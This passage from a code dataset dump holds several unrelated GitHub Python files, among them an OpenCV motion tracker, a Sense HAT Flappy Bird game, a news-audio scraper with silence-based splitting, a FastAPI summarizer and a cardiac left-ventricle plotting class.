data_loader(cfg,is_trian)","repo_name":"Peter-zds/StrokePrediction","sub_path":"core/dataloader/dataloader_builder.py","file_name":"dataloader_builder.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73256272372","text":"__all__ = [\n \"capture\",\n]\n\nimport logging\nimport subprocess\n\nfrom capsula.config import CapsulaConfig\nfrom capsula.context import Context\n\nlogger = logging.getLogger(__name__)\n\n\ndef capture(*, config: CapsulaConfig) -> Context:\n \"\"\"Capture the context.\"\"\"\n logger.debug(f\"Capture config: {config.capture}\")\n\n for command in config.capture.pre_capture_commands:\n logger.info(f\"Running pre-capture command: {command!r}\")\n try:\n result = subprocess.run(\n command,\n shell=True, # noqa: S602\n text=True,\n capture_output=True,\n check=True,\n cwd=config.root_directory,\n )\n except subprocess.CalledProcessError:\n logger.exception(f\"Pre-capture command failed: {command}\")\n raise\n else:\n logger.info(f\"Pre-capture command result: {result}\")\n\n logger.info(\"Capturing the context.\")\n\n config.ensure_capsule_directory_exists()\n\n ctx = Context.capture(config)\n\n # Write the context to the output file.\n with (config.capsule / \"context.json\").open(\"w\") as output_file:\n output_file.write(ctx.model_dump_json(indent=4))\n\n return ctx\n","repo_name":"shunichironomura/capsula","sub_path":"capsula/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74108316854","text":"from fastapi import FastAPI\nfrom transformers import pipeline\nimport uvicorn\n\nimport nest_asyncio\nnest_asyncio.apply()\n\napp = FastAPI()\n\n# Create a text summarization pipeline using Transformers\nsummarizer = pipeline(\"summarization\")\n\n@app.post(\"/summarize/\")\nasync def summarize_text(input_text: dict):\n \"\"\"\n Summarize a given text.\n :param input_text: {\"text\": \"Your input text here\"}\n :return: {\"summary\": \"Generated summary here\"}\n \"\"\"\n text = input_text[\"text\"]\n summary = summarizer(text, max_length=150, min_length=30, do_sample=False)[0][\"summary_text\"]\n return {\"summary\": summary}\nif __name__=='__main__':\n uvicorn.run(app,host='127.0.0.1',port=5500)","repo_name":"Sanjayredd/Summarizer-api-using-transformers-and-Fastapi","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16341599845","text":"import numpy as np\nfrom CamRunnable import camVideoStream\nimport math as m\nfrom time import sleep\nimport cv2\nimport Plotter\n\nframe_lim = 2000 # Number of independent frames to analyze\ngroup_scale = 100 # How many key points will be tracked\nuse_CLAHE = False # Whether or not normalize for brightness\nbuffer_comparator = [] # Where I will store the information\nbuffer_size = 3 # Number of frames to be considered to attempt a velocity estimation\nanimate = True\npoint_velocities = np.zeros(shape=(group_scale,2)) # Column matrix containing all velocities being monitored at any given time\npoint_distances = np.zeros(shape=(group_scale,2)) # Column matrix containing all velocities being monitored at any given time\norb = cv2.ORB_create() # Oriented FAST and rotated BRIEF characterizer to use within the system # nfeatures = 500,scaleFactor = 1.2,nlevels = 8,edgeThreshold = 31,firstLevel = 0,WTA_K = 2,scoreType = ORB.HARRIS_SCORE,patchSize = 31,fastThreshold = 20\nclahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8,8)) # Setting up the histogram equalizer (these numbers work well for my web camera)\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) # Matching object being initialized beforehand\nprevious_time = -1\ncurr_frame = 0\ncam_holder = cv2.VideoCapture('C:\\\\Users\\\\David\\\\Desktop\\\\maVideo.mp4')\n#cam_holder = camVideoStream(0,30,640,480)\n#cam_holder.start()\n\nrecord_count = 0\n\ndivision_bin = 50 # To differentiate points\nmax_uniaxial_bins = 10 # This number squared will divide the clusters of data\nthreshold_min = 20\nthreshold_max = division_bin*max_uniaxial_bins+threshold_min\ntime = 0\nif animate: my_plot = Plotter.plotter(200,200,50,50,2,False)\ndef compare_velocities(buffer,point_velocities,point_distances,image):\n velocity_organizer = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1,2)) # Refresh arrays used in velocity isolation\n position_organizer = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1,2))\n frequency_organizer = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1))\n extreme_points = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1,4))\n captured_base = np.zeros(shape=(2*max_uniaxial_bins+1,2*max_uniaxial_bins+1)) # Check to accumulate the boundaries of the clusters\n\n T = threshold_min # some made up velocity threshold (40 pixels per second)\n \n stream = []\n minVx = []\n maxVx = []\n minVy = []\n maxVy = []\n position = []\n for a_reference1 in buffer:\n for a_reference2 in buffer:\n if a_reference2[2] > a_reference1[2]: # Only compute matches IF the second reference has happened LATER than the first, \n matches = bf.match(a_reference1[1],a_reference2[1]) # giving us an upper triangular analysis of the buffers available: 12, 13, 14, 23, 24, 34 for a buffer of size 4, for example \n dt = a_reference2[2]-a_reference1[2] # we need dt as well\n matches = sorted(matches, key = lambda x:x.distance)\n i = 0\n for a_match in matches:\n img_index = a_match.queryIdx\n reference_index = a_match.trainIdx\n img_loc = a_reference1[0][img_index].pt\n ref_loc = a_reference2[0][reference_index].pt\n locations = [img_loc[0],img_loc[1],ref_loc[0],ref_loc[1]]\n displacements = [ref_loc[0]-img_loc[0],ref_loc[1]-img_loc[1]]\n V_mag = m.sqrt((displacements[0]/dt)**2+(displacements[1]/dt)**2)\n if m.fabs(displacements[0]/dt) < threshold_max and m.fabs(displacements[1]/dt) < threshold_max:\n if animate and V_mag > T: cv2.rectangle(image,(int(ref_loc[0]),int(ref_loc[1])),(int(ref_loc[0])+2,int(ref_loc[1])+2),(255,255,255),2)\n if m.fabs(displacements[0]/dt) > threshold_min:\n point_velocities[i][0] = (displacements[0]/dt)\n else:\n point_velocities[i][0] = 0\n if m.fabs(displacements[1]/dt) > threshold_min:\n point_velocities[i][1] = (displacements[1]/dt)\n else:\n point_velocities[i][1] = 0\n x_bin_pos = int(np.sign(point_velocities[i][0])*m.ceil(m.fabs((point_velocities[i][0]-threshold_min*np.sign(point_velocities[i][0]))/division_bin)))+max_uniaxial_bins\n y_bin_pos = int(np.sign(point_velocities[i][1])*m.ceil(m.fabs((point_velocities[i][1]-threshold_min*np.sign(point_velocities[i][1]))/division_bin)))+max_uniaxial_bins\n if captured_base[x_bin_pos][y_bin_pos] == 0: # Captures extreme points of the cluster (first one is a default) [xmin xmax ymin ymax] per histogram slot\n extreme_points[x_bin_pos][y_bin_pos][0] = int(ref_loc[0])\n extreme_points[x_bin_pos][y_bin_pos][1] = int(ref_loc[0])\n extreme_points[x_bin_pos][y_bin_pos][2] = int(ref_loc[1])\n extreme_points[x_bin_pos][y_bin_pos][3] = int(ref_loc[1])\n captured_base[x_bin_pos][y_bin_pos] = 1\n else:\n if int(ref_loc[0]) > extreme_points[x_bin_pos][y_bin_pos][1]:\n extreme_points[x_bin_pos][y_bin_pos][1] = int(ref_loc[0])\n if int(ref_loc[0]) < extreme_points[x_bin_pos][y_bin_pos][0]:\n extreme_points[x_bin_pos][y_bin_pos][0] = int(ref_loc[0])\n if int(ref_loc[1]) > extreme_points[x_bin_pos][y_bin_pos][3]:\n extreme_points[x_bin_pos][y_bin_pos][3] = int(ref_loc[1])\n if int(ref_loc[1]) < extreme_points[x_bin_pos][y_bin_pos][2]:\n extreme_points[x_bin_pos][y_bin_pos][2] = int(ref_loc[1])\n velocity_organizer[x_bin_pos][y_bin_pos][0] += (point_velocities[i][0]) # Here classification magic happens!!\n velocity_organizer[x_bin_pos][y_bin_pos][1] += (point_velocities[i][1]) # Here classification magic happens!!\n position_organizer[x_bin_pos][y_bin_pos][0] += int(ref_loc[0]) # Here classification magic happens!!\n position_organizer[x_bin_pos][y_bin_pos][1] += int(ref_loc[1]) # Here classification magic happens!!\n frequency_organizer[x_bin_pos][y_bin_pos] += 1\n point_distances[i][0] = int(ref_loc[0])\n point_distances[i][1] = int(ref_loc[1])\n i+=1\n if i >= group_scale:\n minVx.append(np.min(point_velocities[:,0]))\n maxVx.append(np.max(point_velocities[:,0]))\n minVy.append(np.min(point_velocities[:,1]))\n maxVy.append(np.max(point_velocities[:,1]))\n break\n stream.append(np.copy(point_velocities))\n position.append(np.copy(point_distances))\n for x in range(len(frequency_organizer)):\n for y in range(len(frequency_organizer[0])):\n if frequency_organizer[x][y] > 0:\n velocity_organizer[x][y][0] = velocity_organizer[x][y][0]/(frequency_organizer[x][y])\n velocity_organizer[x][y][1] = velocity_organizer[x][y][1]/(frequency_organizer[x][y])\n position_organizer[x][y][0] = position_organizer[x][y][0]/(frequency_organizer[x][y])\n position_organizer[x][y][1] = position_organizer[x][y][1]/(frequency_organizer[x][y])\n if frequency_organizer[x][y] > 0 and (x != max_uniaxial_bins and y != max_uniaxial_bins):\n if animate:\n x_pos = int(position_organizer[x][y][0])\n y_pos = int(position_organizer[x][y][1])\n V = m.sqrt((velocity_organizer[x][y][0])**2+(velocity_organizer[x][y][1])**2)\n cv2.rectangle(image,(x_pos,y_pos),(x_pos+2,y_pos+2),(0,0,0),2)\n cv2.rectangle(image,(int(extreme_points[x][y][0]),int(extreme_points[x][y][2])),(int(extreme_points[x][y][1]),int(extreme_points[x][y][3])),(238,130,238),2)\n cv2.arrowedLine(image,(x_pos,y_pos),(x_pos+int(velocity_organizer[x][y][0]/10),y_pos+int(velocity_organizer[x][y][1]/10)),(0,255,0),thickness=1)\n cv2.putText(image,str('%.3f'%V),(x_pos,y_pos), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,255),1,cv2.LINE_AA)\n if animate: my_plot.plot_information(image,stream,[-500,500],[-500,500])\n return stream, position\nwhile curr_frame <= frame_lim:\n grabbed, a_frame = cam_holder.read()\n if grabbed == False:\n break\n a_frame = cv2.resize(a_frame, (640, 480)) \n time += 1/30\n #a_frame, time = cam_holder.read()\n if time != previous_time:\n gray_frame = cv2.cvtColor(a_frame,cv2.COLOR_BGR2GRAY) \n if use_CLAHE:\n gray_cl = clahe.apply(gray_frame)\n kp, des = orb.detectAndCompute(gray_cl,None)\n else:\n kp, des = orb.detectAndCompute(gray_frame,None)\n if kp: # Proceed if detection was successful\n if record_count < buffer_size: # If we have not captured enough frames to compute velocities\n buffer_comparator.append([kp,des,time]) # Save whatever you got in the current frame to be used\n record_count += 1 # Let the program know that you have recorded a frame\n else: # We now got enough frames to always be 'full'\n buffer_comparator = buffer_comparator[1:] # Erase first element from the list and move entire list of objects back\n buffer_comparator.append([kp,des,time]) # Save whatever you got in the current frame to be used in the LAST position\n stream, pos = compare_velocities(buffer_comparator,point_velocities,point_distances,a_frame)\n #compute_movement(stream,pos)\n cv2.imshow('original',a_frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n previous_time = time\n curr_frame = curr_frame + 1\n else:\n sleep(0.017)\ncam_holder.stop()\ncv2.destroyAllWindows()\n","repo_name":"HDavidSolano/small-cv-projects","sub_path":"CraftedCVCodes/OldMovementDec.py","file_name":"OldMovementDec.py","file_ext":"py","file_size_in_byte":10390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30020634422","text":"# This code runs a simplified version of Flappy Bird\n# on an emulated 8x8 LED grid\n\n# Usage: \n# Emulator located at: https://trinket.io/sense-hat\n# Copy this code into the window\n# Click 'Stop' then 'Run' at the top\n# Click on the emulated hardware\n# Use arrow keys to dodge red pipes with your green dot\n\n# current bugs:\n# 1. previous game's Astronaut position flashes green on first joystick movement\n# 2. collision detection is very iffy\n\n\n\nfrom sense_hat import SenseHat\nimport time\nfrom random import randint\n\ns = SenseHat() \n\nB = (0, 0, 255) # Background color (blue)\nP = (255, 0, 0) # Pipe color (red)\nA = (0, 255, 0) # Astronaut's color (green)\n\ngameOver = False # used for game loop condition\n\n# creates 8 lists of 8 (blue) background pixels\nmatrix = [[B for col in range(8)] for row in range(8)]\n\n# global vars for initial Astronaut coordinates\nx = 0\ny = 0\n\n\n# Converts matrix from 8 lists of 8 pixels, into an array of 64 pixels\n# (set_pixels requires this format)\ndef flatten(matrix):\n f = []\n for row in matrix:\n for pixel in row:\n f.append(pixel)\n return f\n \n# Creates a solid pipe in the last column (last pixel of every row), then randomly \n# generates a 3 pixel gap in the Pipe\ndef genPipes(matrix):\n for row in matrix:\n row[-1] = P\n gap = randint(0,2)\n matrix[gap][-1], matrix[gap + 1][-1], matrix[gap + 2][-1] = B, B, B\n return matrix\n \n# moves every pixel to the left one, then creates a new blue column on the right\ndef movePipes(matrix):\n for row in matrix:\n for i in range(7):\n row[i] = row[i+1]\n row[-1] = B\n return matrix\n\ndef drawAstronaut(event):\n global x, y, matrix # allows function to change global vars\n s.set_pixel(x,y,B) # erases astronauts previous location to prevent location to prevent doubling\n \n # logic for Astronaut movement, with boundary checks\n if event.action == 'pressed': # IMPORTANT: skipping <--THIS line leads to doubled inputs, because \n if event.direction == \"up\" and y > 0: # event.action == 'released' with event.direction == 'up' \n y -= 1 # would also execute <--THIS line of code\n elif event.direction == \"down\" and y < 7:\n y += 1\n elif event.direction == \"left\" and x > 0:\n x -= 1\n elif event.direction == \"right\" and x < 7:\n x += 1\n\n s.set_pixel(x,y,A) # draw Astronaut in new, moved position\n checkCollision(matrix) # check if Astronaut has hit Pipe\n \n \n# if Astronaut is on a Pipe, lose game\ndef checkCollision(matrix): \n global gameOver # allows setting of global var gameOver\n if matrix[y][x] == P:\n gameOver = True\n\n# whenever the joystick is moved, call drawAstronaut\ns.stick.direction_any = drawAstronaut\n\n\n# \"infinite\" game loop\nwhile not gameOver: \n matrix = genPipes(matrix) # create Pipes in matrix\n checkCollision(matrix) # check collisions\n for i in range(4): # this loop breaks every 4 cycles to create new Pipe (above)\n s.set_pixels(flatten(matrix)) # draw game\n s.set_pixel(x,y,A) # draw Astronaut\n matrix = movePipes(matrix) # shift game\n checkCollision(matrix) # check collisions\n if gameOver: \n break\n time.sleep(1) # wait 1 second\n \n# scrolling text when the game ends\ns.show_message('GAME OVER')\n","repo_name":"aboring/portfolio","sub_path":"flap.py","file_name":"flap.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16289198474","text":"from bs4 import BeautifulSoup\nimport os, sys, re\nimport requests\nfrom urllib.request import urlretrieve\nimport time, random\nimport librosa\nimport soundfile as sf\nimport numpy as np\n\ndef listToString(s): \n str1 = \" \"\n return (str1.join(s)) \n\ndef has_cyrillic(text):\n return bool(re.search('[\\u0400-\\u04FF]', text))\n\ndef splitBySilence (audio, maxSilence=1530, silenceDur=.33):\n '''\n Spliting audio by silence\n\n audio - path to the audio\n maxSilence - maximum number of the sample anplitude \n silenceDur - duration of the silence in seconds\n '''\n\n data, sr = librosa.load(audio, sr=16000) # reading file and taking samples and change sample rate to 16 kHz\n t = librosa.get_duration(y=data,sr=sr) # audio duration in seconds\n time = np.arange(0, t, t/len(data)) # arange the time accroding to samples' size\n\n silenceP = [] # list to store our points of silence begining on the audio \n silence = 0 # variable to calculate if it is silence or not\n i = 0\n while i < len(time):\n if np.abs(data[i]*sr) < maxSilence: # if the amplitude of the voice is not bigger than given value\n silence += int((len(time)*.01)/(int(t))) # starting calculating silence time by adding 0.01 second \n if silence >= int((len(time)*silenceDur)/(int(t))): # if it is bigger than 0.03 seconds => silence\n silenceP.append(i - silenceDur*len(time)/t) # adding the beginning of the silence\n silence = 0 # after considiration that it is silince we are starting again to calculate silence point\n else: \n silence = 0 # in case if this wasn't silence we begin to calculate it from 0\n i += int((len(time)*.01)/(int(t))) # checking each 0.01 of the second\n\n newSilence = [] # list of the real silence point\n for j in range(len(silenceP)): \n if j+1 == len(silenceP): break \n\n if round(silenceP[j+1]-silenceP[j],1) > (silenceDur+0.1)*len(time)/t: # if the difference of the neighbor silence points are bigger than the silenc min+0.01 second\n if newSilence: # Then it was actually not the silence \n if newSilence[len(newSilence)-1] == silenceP[j]: # In case if the beginning of the silence equal to the end of the previous silence part \n newSilence.remove(silenceP[j])\n newSilence.append(silenceP[j+1])\n else:\n newSilence.append(silenceP[j])\n newSilence.append(silenceP[j+1])\n else:\n newSilence.append(silenceP[j])\n newSilence.append(silenceP[j+1])\n \n dividedData, durations = [], []\n j = 0\n while j < len(newSilence):\n if j+1 != len(newSilence): \n print (int(newSilence[j]),int(newSilence[j+1]))\n durations.append((newSilence[j+1]-newSilence[j])*t/len(time)) # adding to the list of the durations of non-silent parts\n dividedData.append(data [int(newSilence[j]+100):int(newSilence[j+1])]) # completeng list of the new data of samples\n j+=2\n\n\n return dividedData, durations, sr\n\nif len(sys.argv) != 2:\n print('Usage: download_audio.py {number_of_audios_to_download}')\n quit()\n\nif not os.path.exists('audios'):\n os.makedirs('audios')\n\nif not os.path.exists('splitted'):\n os.makedirs('splitted')\n\nif not os.path.exists('texts'):\n os.makedirs('texts')\n\n# Gets list of already checked news\nchecked = []\nif os.path.exists('checked.txt'):\n fp = open('checked.txt','r+')\n line = fp.readline()\n while line:\n checked.append(line)\n line = fp.readline()\n f = lambda x: x.replace(\"\\n\", \"\")\n checked = list(map(f, checked))\nelse:\n fp = open('checked.txt','a')\n\ncount, k, collected = 1, 1, 0\nwhile os.path.exists('./audios/audio_' + str(count) + '.wav'):\n count += 1\t\nwhile os.path.exists('./splitted/splitted_' + str(k) + '.wav'):\n k += 1\n\nnews = str(373557)\n\n\nwhile collected != int(sys.argv[1]):\n\n # Get the not checked news\n while news in checked:\n news = str(int(news)-1)\n checked.append(news)\n fp.write(news+'\\n') \n\n rulingpage = requests.get(\"https://oxu.az/world/\" + news, timeout=5).text\n soup = BeautifulSoup(rulingpage, 'html.parser')\n doctext = soup.find('div', class_='news-inner')\n \n # If the news exists\n if doctext != None:\n text = re.sub(r'[^\\w\\s]','',listToString(doctext.text.split('\\n')[1:]))\n \n # If the news not in russian\n if not has_cyrillic(text):\n\n print(\"Found right news:\", news, \". Searching for audio...\",)\n print ('Downloading...')\n\n audio_link = soup.find('audio')\n \n if audio_link != None:\n audio_link = audio_link.get(\"src\")\n urlretrieve(audio_link, './audios/audio_' + str(count) + '.mp3')\n\n audio_duration = librosa.get_duration(filename='./audios/audio_' + str(count) + '.mp3')\n\n # Transform mp3 to wav format\n os.popen('sox ' + './audios/audio_' + str(count) + '.mp3' + ' -e signed-integer -c 1 -b 16 -r 22050 ' + './audios/audio_' + str(count) + '.wav')\n time.sleep(1)\n os.remove('./audios/audio_' + str(count) + '.mp3')\n\n # Downloads text of the audio\n f = open('./texts/audio_text_' + str(count) +'.txt', \"a\")\n f.write(re.sub(r'[^\\w\\s]','',listToString(doctext.text.split('\\n')[1:])))\n\n divided, durations, s = splitBySilence('./audios/audio_' + str(count) + '.wav', maxSilence=250, silenceDur=0.045)\n\n\n for i in range(len(divided)):\n name = './splitted/splitted_' + str(k)+'.wav' # naming audio chunk\n sf.write(name, divided[i],s,subtype='PCM_16') # write it first and changing bit rate\n k+=1\n\n count += 1\n collected += 1\n\n news = str(int(news)-1)\n","repo_name":"sevilj/tts_data_collection","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10451772122","text":"# 3273\n\nimport sys\ninput = sys.stdin.readline\n\ndef sol( ):\n # 정렬을 해도 딱히 상관이 없는 듯 하다.\n length = int(input())\n arr = list(map(int,input().strip().split()))\n target = int(input())\n count,left,right = 0,0,length-1\n arr.sort()\n\n while(left number1:\n\t\treturn number1, number2\n\telse:\n\t\treturn number2, number1\n\n# 1) Fill in the blanks so the print statement displays the result\n# of the function call\nsmaller, bigger = order_numbers(100, 99)\nprint(smaller, bigger)\n\ndef lucky_number(name):\n number = len(name) * 9\n message = \"Hello \" + name + \". Your lucky number is \" + str(number)\n return message\n\t \nprint(lucky_number(\"Kay\"))\nprint(lucky_number(\"Cameron\"))","repo_name":"code-org-ndarocha/Google_Coursera-IT_Automation","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29546032345","text":"import numpy as np\nfrom .lv_metrics_geometrics_computations import LVGeometricsComputations\n# from project_heart.enums import CONTAINER, STATES, LV_SURFS\nfrom project_heart.utils.spatial_utils import centroid, radius\nfrom project_heart.modules.speckles.speckle import Speckle, SpeckeDeque\nfrom project_heart.utils.enum_utils import add_to_enum\n\nfrom project_heart.utils.extended_classes import ExtendedDict\n\nimport logging\n\nlogger = logging.getLogger('LV3DMetricsPlotter')\n\nfrom collections import deque\n\n\nclass LV3DMetricsPlotter(LVGeometricsComputations):\n def __init__(self, log_level=logging.INFO, *args, **kwargs):\n super(LV3DMetricsPlotter, self).__init__(log_level=log_level, *args, **kwargs)\n self.EPSILON = 1e-10\n self.explainable_metrics = ExtendedDict() # stores methods and approach used for metric computations\n logger.setLevel(log_level)\n \n def _reolve_window_size(self, ws):\n if ws is None:\n ws = (600,400)\n return ws\n\n def _get_metrics_3D_plotter(self, t=0.0, window_size=None, **kwargs):\n window_size = self._reolve_window_size(window_size)\n \n default_kwargs = dict(\n style='points', \n color=\"gray\", \n opacity=0.6,\n window_size=window_size\n )\n default_kwargs.update(kwargs)\n # plotmesh and virtual nodes\n return self.plot(t=t, re=True, **default_kwargs)\n \n def _resolve_plotter(self, plotter, plot_kwargs, t=0.0):\n # resolve plotter\n if plotter is None:\n if plot_kwargs is None:\n plot_kwargs = dict()\n plotter = self._get_metrics_3D_plotter(t=t, **plot_kwargs)\n return plotter\n \n def plot_longitudinal_line(self, \n t=0.0,\n re=False, \n line_kwargs=None,\n points_kwargs=None,\n plot_kwargs=None, \n plotter=None,\n window_size=None,\n **kwargs):\n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(plotter, plot_kwargs, t=t)\n # get apex and base at given timestep\n apex = self.states.get(self.STATES.APEX_REF, t=t)\n base = self.states.get(self.STATES.BASE_REF, t=t)\n # create long line for plot\n from project_heart.utils import lines_from_points\n line = lines_from_points((apex, base))\n # set default args for long line and update if user provided\n d_kwargs = dict(color=\"cyan\")\n if line_kwargs is not None:\n d_kwargs.update(kwargs)\n # add line mesh\n plotter.add_mesh(line, **d_kwargs)\n # add points\n d_kwargs = dict(color=\"orange\", point_size=400)\n if points_kwargs is not None:\n d_kwargs.update(points_kwargs)\n plotter.add_points(np.vstack([apex, base]), **d_kwargs)\n \n # if requested, return plotter\n if re:\n return plotter\n # if not requested, show plot\n else:\n plotter.show(window_size=window_size)\n \n # speckle plotter\n \n def plot_speckles(self, \n spk_args, \n t=0, \n show_subset_centers=False,\n show_la_centers=False,\n show_clusters=False,\n show_clusters_centers=False,\n c_centers_kwargs=None,\n show_longitudinal_line=False,\n fix_longitudinal_line=False,\n subsets_cmap=\"tab20\",\n clusters_cmap=\"hot\",\n window_size=None, \n plotter=None,\n plot_kwargs=None, \n re=False,\n **kwargs):\n \n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(plotter, plot_kwargs, t=t)\n if show_longitudinal_line:\n if fix_longitudinal_line:\n tla = 0.0\n else:\n tla = t\n plotter = self.plot_longitudinal_line(t=tla, plotter=plotter, window_size=window_size, re=True)\n \n # resolve speckles\n spk_deque = self._resolve_spk_args(spk_args) \n \n # get spk data\n spk_pts = self.get_speckles_xyz(spk_deque, t=t) # spk locations\n \n # plot speckles\n if not show_clusters: #plot speckle points with subsets\n bins = spk_deque.binarize()\n plotter.add_points(spk_pts, scalars=bins, cmap=subsets_cmap, point_size=200)\n else:\n klabels = spk_deque.binarize_clusters()\n kl_ids = spk_deque.enumerate_ids()\n bins = np.zeros(len(klabels))\n bins[kl_ids] = klabels + 1\n plotter.add_points(spk_pts, scalars=bins, cmap=clusters_cmap, point_size=250)\n \n # plot additional info\n if show_subset_centers:\n centers = self.get_speckles_centers(spk_deque, t=t)\n plotter.add_points(centers, color=\"orange\", point_size=275)\n if show_clusters_centers:\n if c_centers_kwargs is None:\n c_centers_kwargs = dict()\n centers = self.get_speckles_c_centers(spk_deque, t=t, **c_centers_kwargs)\n plotter.add_points(centers, color=\"red\", point_size=275)\n if show_la_centers:\n centers = self.get_speckles_la_centers(spk_deque, t=t)\n plotter.add_points(centers, color=\"purple\", point_size=300)\n \n # resolve plotter return\n if re:\n return plotter\n else:\n plotter.show(window_size=window_size)\n \n # metrics\n \n def _resolve_exm(self, key):\n all_exm = self.explainable_metrics.all(key)\n if len(all_exm) == 0:\n raise RuntimeError(\"No explainable metric for longitudinal distance was found. \"\n \"Did you compute it or loaded from a file? \"\n \"Only metrics compute with this package can be used for 3D plot.\")\n return all_exm\n \n def _resolve_ss_sa(self, exms, key):\n approaches = set()\n speckles = deque()\n for exm in exms.values():\n approaches.add(exm.approach)\n speckles.append(exm.speckles)\n \n if len(approaches) > 1:\n raise RuntimeError(\"Multiple approaches found for '{}'.\"\n \"Currently, only one approach must be selected to plot.\"\n .format(key))\n approach = list(approaches)[0]\n spk_deque = SpeckeDeque(speckles)\n return approach, spk_deque\n \n def plot_longitudinal_distance(self, t=0.0, colors=None, \n window_size=None, plot_kwargs=None, log_level=logging.INFO):\n from project_heart.utils import lines_from_points\n log = logger.getChild(\"plot_longitudinal_distance\")\n log.setLevel(log_level)\n \n key = self.STATES.LONGITUDINAL_DISTANCE\n all_exm = self._resolve_exm(key)\n \n use_exm = all_exm.all(\"base\")\n if len(use_exm) == 0:\n log.warn(\"No 'base' explainable metric was found. Will use all values found, \"\n \"but lines might be duplicated during plot.\")\n use_exm = all_exm\n \n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(None, plot_kwargs, t=t)\n \n if colors is None:\n colors = [\"green\", \"orange\", \"brown\", \"blue\", \"red\"]\n idx = self.states.get_timestep_index(t)\n apex_ts = deque()\n base_ts = deque()\n for i, exm in enumerate(use_exm.values()):\n # get apex and base at given timestep\n apex = exm.apex[idx]\n base = exm.base[idx]\n # create long line for plot\n line = lines_from_points((apex, base))\n # add line mesh\n plotter.add_mesh(line, color=colors[i])\n # add points\n plotter.add_points(np.vstack([apex, base]), color=colors[i], point_size=400)\n apex_ts.append(apex)\n base_ts.append(base)\n # reduce values\n apex_reduced = np.mean(apex_ts, axis=0)\n base_reduced = np.mean(base_ts, axis=0)\n # create long line for plot\n line = lines_from_points((apex_reduced, base_reduced))\n # add line mesh\n plotter.add_mesh(line, color=\"magenta\")\n # add points\n plotter.add_points(np.vstack([apex_reduced, base_reduced]), color=\"magenta\", point_size=400)\n # show plot\n plotter.show(window_size=window_size)\n \n def plot_radial_distance(self,\n t=0.0,\n window_size=None,\n plotter=None,\n plot_kwargs=None,\n log_level=logging.INFO,\n ):\n \n from project_heart.utils import project_pt_on_line\n log = logger.getChild(\"plot_radial_distance\")\n log.setLevel(log_level)\n # set key\n key = self.STATES.RADIAL_DISTANCE\n all_exm = self._resolve_exm(key)\n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(None, plot_kwargs, t=t)\n # resolve simple speckle and singular approach \n approach, spk_deque = self._resolve_ss_sa(all_exm, key)\n # reolved variables to plot\n if approach == \"moving_vector\":\n fla=False\n apex_ts = self.states.get(self.STATES.APEX_REF, t=t)\n base_ts = self.states.get(self.STATES.BASE_REF, t=t)\n elif approach == \"fixed_vector\":\n fla=True\n apex_ts = self.states.get(self.STATES.APEX_REF, t=0)\n base_ts = self.states.get(self.STATES.BASE_REF, t=0)\n else:\n raise RuntimeError(\"Invalid approach found: {}\".format(approach))\n # plot radial distance\n spk_pts = self.get_speckles_xyz(spk_deque, t=t) \n for pt in spk_pts:\n p_pt = project_pt_on_line(pt, apex_ts, base_ts)\n plotter.add_lines(np.vstack((pt, p_pt)), color=\"magenta\")\n # plot speckles\n plotter = self.plot_speckles(spk_deque, \n t=t,\n show_longitudinal_line=True, \n fix_longitudinal_line=fla,\n plotter=plotter,\n re=True,\n )\n # show plot\n plotter.show(window_size=window_size)\n \n def plot_radial_length(self,\n t=0.0,\n window_size=None,\n plotter=None,\n plot_kwargs=None,\n log_level=logging.INFO,\n ):\n\n log = logger.getChild(\"plot_radial_length\")\n log.setLevel(log_level)\n # set key\n key = self.STATES.RADIAL_LENGTH\n all_exm = self._resolve_exm(key)\n # resolve plotter and window size\n window_size = self._reolve_window_size(window_size)\n plotter = self._resolve_plotter(None, plot_kwargs, t=t)\n # resolve simple speckle and singular approach \n approach, spk_deque = self._resolve_ss_sa(all_exm, key)\n # reolved variables to plot\n if approach == \"moving_centers\":\n fla=False\n elif approach == \"fixed_centers\":\n fla=True\n else:\n raise RuntimeError(\"Invalid approach found: {}\".format(approach))\n \n # plot radial distance\n # spk_pts = self.get_speckles_xyz(spk_deque, t=t)\n la_centers = self.get_speckles_la_centers(spk_deque, t=t)\n \n for spk, lapt in zip(spk_deque, la_centers):\n xyz = self.states.get(self.STATES.XYZ, t=t, mask=spk.ids)\n for pt in xyz:\n plotter.add_lines(np.vstack((pt, lapt)), color=\"magenta\")\n \n # plot speckles\n plotter = self.plot_speckles(spk_deque, \n t=t,\n show_longitudinal_line=True, \n show_la_centers=True,\n fix_longitudinal_line=fla,\n plotter=plotter,\n re=True,\n )\n # show plot\n 